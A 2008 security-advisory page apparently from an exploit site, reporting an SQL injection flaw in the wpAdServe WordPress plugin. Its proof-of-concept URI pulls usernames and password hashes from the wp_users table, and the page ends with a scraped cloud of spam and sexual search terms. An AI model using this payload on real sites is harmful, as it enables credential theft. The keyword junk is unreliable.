about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , WordPress Plugin AdServe SQL Injection Vulnerability


Title WordPress Plugin AdServe SQL Injection Vulnerability
Published 2008-01-30-12:00AM
Updated 2008-01-30-04:27PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  enter_the_dragon discovered this vulnerability.
Vulnerable  wpAdServe wpAdServe 0.2
Not Vulnerable  
Code  An attacker can exploit this issue via a browser.The following proof-of-concept URI is available:http://www.example.com/wp-content/plugins/wp-adserve/adclick.php?id=-1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 17:44:02 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
homens pel ZSNES squid web ARB SEX php-nuke 2 sharmili www.rudetu India scho trisha bat phpbb%202% wwwsex.com www x vide www.mct.tv Www.Indian hot bebs Sex lanka Bigtits.co /vuln/expl sexmarocan imagessex Crack+Data www.sexgay sexmarocan mambo Remo www.hpleno WWW.ENGLIS k910.net chinasex.c girlsboobs katariakfa www.boii freexxxcli free sing smartschoo Anak sekol www.sexy l Wwwsavixx. www.chinav Www wapric Female Imp www.89.c0m animal sze anal null sess 200 /compo India fuck angelsofin Nude image components 200 /compo